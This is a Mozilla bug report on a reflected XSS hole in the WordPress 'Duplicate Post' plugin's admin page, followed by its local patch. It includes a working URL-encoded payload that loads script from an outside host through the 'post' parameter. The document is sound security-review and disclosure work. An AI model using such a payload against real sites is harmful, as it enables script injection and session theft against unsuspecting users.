Closed
Bug 770300
Opened 12 years ago
Closed 12 years ago
"Duplicate Post" WP Plugin - Fix XSS Before Adding to Air Mozilla Blog
Categories
(Infrastructure & Operations Graveyard :: WebOps: Other, task)
Tracking
(Not tracked)
RESOLVED
FIXED
People
(Reporter: mfuller, Assigned: dmaher)
References
Details
(Keywords: wsec-xss)
Bug 748584 requests that we add the "Duplicate Post" plugin to the Air Mozilla WordPress instance. During the security review, an XSS vulnerability was discovered. Before we can install the plugin, this code must be patched. The issue occurs in the page: duplicate-post-admin.php. The parameter, $id, is saved using $_GET['post']. A URL may look like: site.com/wp-admin/admin.php?action=duplicate_post_save_as_new_post&post=1 where '1' is the post to copy. However, if '1' doesn't exist, an error message is displayed, echoing '1' out without properly escaping. This allows the code: <SCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js><%2FSCRIPT> as a parameter of 'post' to create XSS. To fix this issue, use htmlspecialchars on the output of $id in the following line: wp_die(esc_attr(__('Copy creation failed, could not find original:', DUPLICATE_POST_I18N_DOMAIN)) . ' ' . $id);
Comment 1•12 years ago
|
||
I sent the developer of the plug-in a link to this bug.
Reporter | ||
Comment 2•12 years ago
|
||
I also emailed the developer the day I found the bug and he replied saying he would provide an update. If this is not an urgent install for the blog owner, we can go ahead and wait for his update. If it is urgent, the fix involves adding one function around one line of code after the plugin is installed. Either way, let me know and I'll re-review it once it's updated. Thanks, Matt
Comment 3•12 years ago
|
||
Assigning to WebOps to patch locally for deployment.
Assignee: nobody → server-ops-webops
Component: air.mozilla.com → Server Operations: Web Operations
Product: Websites → mozilla.org
QA Contact: cshields
Version: Firefox 6 → other
Comment 4•12 years ago
|
||
:zandr both -dev and -stage are now running the new reboot code for air.m.o, which is not wordpress based. on the production nodes, there is no duplicate post plugin, as expected. is there something specific you're looking for us (webops) to complete for you on this?
Assignee | ||
Updated•12 years ago
|
Assignee: server-ops-webops → dmaher
Assignee | ||
Comment 5•12 years ago
|
||
:cturra so the request is that webops implement the plugin in prod, but instead of running the vanilla code, we patch it as indicated in comment #1. My plan is to pull the plugin repo as normal, create a local branch, modify the code, and roll with that. :richard has confirmed that the prod site is EOL right now anyways, so we don't need to worry about long-term support.
Assignee | ||
Comment 6•12 years ago
|
||
Since creating local-only branches is not possible in svn, I instead simply downloaded the plugin tarball, decompressed it to the correct location, and patched it as necessary. I also added a README.duplicate-post documenting the change. I realise that this is a one-off, but this version of AirMo is EOL, so we don't need to worry about long-term support for this plugin. I have confirmed with :richard that the plugin is operational. Closing bug.
Status: NEW → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
Reporter | ||
Comment 7•12 years ago
|
||
Thanks for your work on this!
Comment 8•11 years ago
|
||
Adding keywords to bugs for metrics, no action required. Sorry about bugmail spam.
Keywords: wsec-xss
Updated•11 years ago
|
Component: Server Operations: Web Operations → WebOps: Other
Product: mozilla.org → Infrastructure & Operations
Updated•5 years ago
|
Product: Infrastructure & Operations → Infrastructure & Operations Graveyard
You need to log in
before you can comment on or make changes to this bug.
Description
•